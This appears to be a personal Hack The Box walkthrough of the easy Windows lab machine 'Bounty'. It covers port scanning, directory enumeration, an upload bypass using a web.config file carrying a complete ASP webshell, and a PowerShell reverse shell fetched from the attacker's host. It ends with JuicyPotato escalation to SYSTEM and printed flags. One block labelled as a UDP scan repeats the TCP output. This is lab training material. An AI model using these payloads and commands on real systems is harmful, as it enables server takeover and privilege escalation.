#hackthebox #easy #windows ![[Pasted image 20250824234322.png]] # Information Gathering - Nmap TCP scan against all ports revealed only one port: 80 ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -Pn -n --open --min-rate 3000 -p- Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-25 01:15 UTC Nmap scan report for 10.10.10.93 Host is up (0.049s latency). Not shown: 65534 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 43.88 seconds ``` Run another TCP scan against the port 80 to gather more information ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -sCV -p 80 Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-25 01:18 UTC Nmap scan report for 10.10.10.93 Host is up (0.047s latency). PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: Bounty Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.17 seconds ``` Lastly, a UDP scan against top 10 ports ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -sCV -p 80 Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-25 01:18 UTC Nmap scan report for 10.10.10.93 Host is up (0.047s latency). PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: Bounty Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.17 seconds ``` --- # Enumeration ##### HTTP - TCP 80 The landing page on port 80 just has an image of an old wizard(?) at the center. ![[Pasted image 20250824201953.png]] There's no more information other than the image. I ran `feroxbuster` to enumerate files/directories. ![[Pasted image 20250824203511.png]] Unfortunately, both `/aspnet_client` and `/uploadedfiles` return the status code `403` meaning we have no authorization to access those pages. Since I know the website is powered by `ASP.NET` and the directory `aspnet_client` exists, I am going to run `gobuster` and enumerate for files with `asp` or `aspx` extensions. ![[Pasted image 20250824205359.png]] `gobuster` discovered `/transfer.aspx` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x asp,aspx =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.10.93 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Extensions: asp,aspx [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /transfer.aspx (Status: 200) [Size: 941] ``` Navigating to `transfer.aspx`, it simply has an file upload feature. ![[Pasted image 20250824205633.png]] I uploaded a random image file that I had in Desktop as a test and it was successfully uploaded. ![[Pasted image 20250824205829.png]] The uploaded image is available in `uploadedfiles`, the directory we had enumerated using `feroxbuster` ![[Pasted image 20250824210610.png]] I tried uploading an `aspx` webshell but it failed ![[Pasted image 20250824211104.png]] ![[Pasted image 20250824211412.png]] However, it still returned an error when I navigated to `/uploadedfiles/cmdasp.aspx` even though the server returned `File uploaded successfully` ![[Pasted image 20250824211506.png]] I was stuck here for a while so I referred to `0xdf`'s writeup. I noticed my error message above is quite different from his. His error message mentions `web.config` in the error message. It suggests to modify the `web.config` file. The `web.config` file has settings and configuration data for web applications on `IIS` servers, similar to a `.htaccess` on an Apache server. Anyways, you can uploaded `.config` files and use them to execute code. One way to do it is appending the code at the end of the file. This is the payload I'm going to use: ```bash <?xml version="1.0" encoding="UTF-8"?> <configuration> <system.webServer> <handlers accessPolicy="Read, Script, Write"> <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> </handlers> <security> <requestFiltering> <fileExtensions> <remove fileExtension=".config" /> </fileExtensions> <hiddenSegments> <remove segment="web.config" /> </hiddenSegments> </requestFiltering> </security> </system.webServer> </configuration> <!-- <% Response.write("-"&"->")%> <% Set oScript = Server.CreateObject("WSCRIPT.SHELL") Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") Function getCommandOutput(theCommand) Dim objShell, objCmdExec Set objShell = CreateObject("WScript.Shell") Set objCmdExec = objshell.exec(thecommand) getCommandOutput = objCmdExec.StdOut.ReadAll end Function %> <BODY> <FORM action="" method="GET"> <input type="text" name="cmd" size=45 value="<%= szCMD %>"> <input type="submit" value="Run"> </FORM> <PRE> <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %> <%Response.Write(Request.ServerVariables("server_name"))%> <p> <b>The server's port:</b> <%Response.Write(Request.ServerVariables("server_port"))%> </p> <p> <b>The server's software:</b> <%Response.Write(Request.ServerVariables("server_software"))%> </p> <p> <b>The server's software:</b> <%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%> <% szCMD = request("cmd") thisDir = getCommandOutput("cmd /c" & szCMD) Response.Write(thisDir)%> </p> <br> </BODY> <%Response.write("<!-"&"-") %> --> ``` I uploaded the `web.config` file and navigated to `/uploadedfiles/web.config`. This finally displayed a webshell! ![[Pasted image 20250824213433.png]] However, the webshell only lasts for a minute or two. It looks like the files under `uploadedfiles` directory are being cleared out every few minutes. ![[Pasted image 20250824213523.png]] # Initial Access - shell as `merlin` So I'm going to use `nishang` to get a reverse shell instead. I opened up `web.config` and replaced our aspx webshell payload with the following. ![[Pasted image 20250824215159.png]] I downloaded `Invoke-PowerShellTcp.ps1` from `nishang` github repo. Then added a line at the very bottom to invoke a callback ![[Pasted image 20250824215647.png]] After `web.config` is uploaded, I visit `/uploadedfiles/web.config` to trigger the file. It will then grab `Invoke-PowerShellTcp.ps1` from my HTTP server thats running on port 80. Finally it will invoke the callback and connect to my reverse shell listener running on port 1234. ![[Pasted image 20250824215857.png]] ![[Pasted image 20250824220247.png]] Got a shell as `merlin` ```powershell ┌──(kali㉿kali)-[~/Desktop] └─$ rlwrap nc -lvnp 1234 listening on [any] 1234 ... connect to [10.10.14.9] from (UNKNOWN) [10.10.10.93] 49158 Windows PowerShell running as user BOUNTY$ on BOUNTY Copyright (C) 2015 Microsoft Corporation. All rights reserved. PS C:\windows\system32\inetsrv>whoami bounty\merlin PS C:\windows\system32\inetsrv> ``` Found hidden `user.txt` in `C:\Users\merlin\Desktop` ```powershell PS C:\Users\merlin\Desktop> ls -Force Directory: C:\Users\merlin\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a-hs 5/30/2018 12:22 AM 282 desktop.ini -arh- 8/25/2025 4:14 AM 34 user.txt PS C:\Users\merlin\Desktop> type user.txt 5e84b37a8d1ec102e2bba301351dbd4e ``` # Privilege Escalation - shell as `SYSTEM` I was going to use `PowerUp.ps1` to search for privilege escalation vectors. However, I was not able to execute it. ```powershell PS C:\Users\merlin\Desktop> certutil -urlcache -split -f http://10.10.14.9:8888/PowerUp.ps1 PowerUp.ps1 **** Online **** 000000 ... 092a04 CertUtil: -URLCache command completed successfully. PS C:\Users\merlin\Desktop> ls Directory: C:\Users\merlin\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 8/25/2025 6:12 AM 600580 PowerUp.ps1 ``` Therefore, I started enumerating vectors manually. `whoami /priv` command reveals our user `merlin` has `SeImpersonatePrivilege` enabled. ```powershell PS C:\Users\merlin\Desktop> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======== SeAssignPrimaryTokenPrivilege Replace a process level token Disabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeAuditPrivilege Generate security audits Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled ``` I transferred `GodPotato.exe` from my kali to target machine ```powershell PS C:\users\merlin\appdata\local\temp> certutil -urlcache -split -f http://10.10.14.9/GodPotato-NET2.exe GodPotato.exe **** Online **** 0000 ... e000 CertUtil: -URLCache command completed successfully. ``` However, it returns `No combase module found`. I think `GodPotato.exe` and this target host are not compatible. ```powershell PS C:\users\merlin\appdata\local\temp> .\GodPotato.exe -cmd "cmd /c whoami" [!] No combase module found ``` ##### JuicyPotato Therefore, I switched to `JuicyPotato`. ```powershell PS C:\users\merlin\appdata\local\temp> certutil -urlcache -split -f http://10.10.14.9/JuicyPotato.exe juicypotato.exe **** Online **** 000000 ... 054e00 CertUtil: -URLCache command completed successfully. ``` My original plan was to create a new user `wook`, add the user to local admin group, and login with the user to the target host via either `evil-wirnm` or `psexec`. However, no matter how many times I tried, it didn't work for me!!! ```powershell PS C:\users\merlin\appdata\local\temp> .\juicypotato.exe -l 1337 -p "cmd.exe" -a "/c net user wook WookPass123! /add" -t * -c '{4991d34b-80a1-4291-83b6-3328366b9097}' Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337 .... [+] authresult 0 {4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM [+] CreateProcessWithTokenW OK ``` ```powershell PS C:\users\merlin\appdata\local\temp> .\juicypotato.exe -l 1337 -p "cmd.exe" -a "/c net localgroup administrators wook /add" -t * -c '{4991d34b-80a1-4291-83b6-3328366b9097}' Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337 .... [+] authresult 0 {4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM [+] CreateProcessWithTokenW OK ``` Then I changed my plan again. Instead of creating a new user, I'm making a reverse shell connection to my kali as `SYSTEM`. Finally I got a shell as `SYSTEM`. The command that worked: ```powreshell .\juicypotato.exe -l 1337 -p "cmd.exe" -a "/c powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.9/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.9 -Port 4444" -t * -c '{4991d34b-80a1-4291-83b6-3328366b9097}' ``` ![[Pasted image 20250824234054.png]] Found `root.txt` in `C:\Users\Administrator\Desktop` ```powershell PS C:\Users\Administrator\Desktop> dir Directory: C:\Users\Administrator\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar-- 8/25/2025 4:14 AM 34 root.txt PS C:\Users\Administrator\Desktop> type root.txt 0e7... ```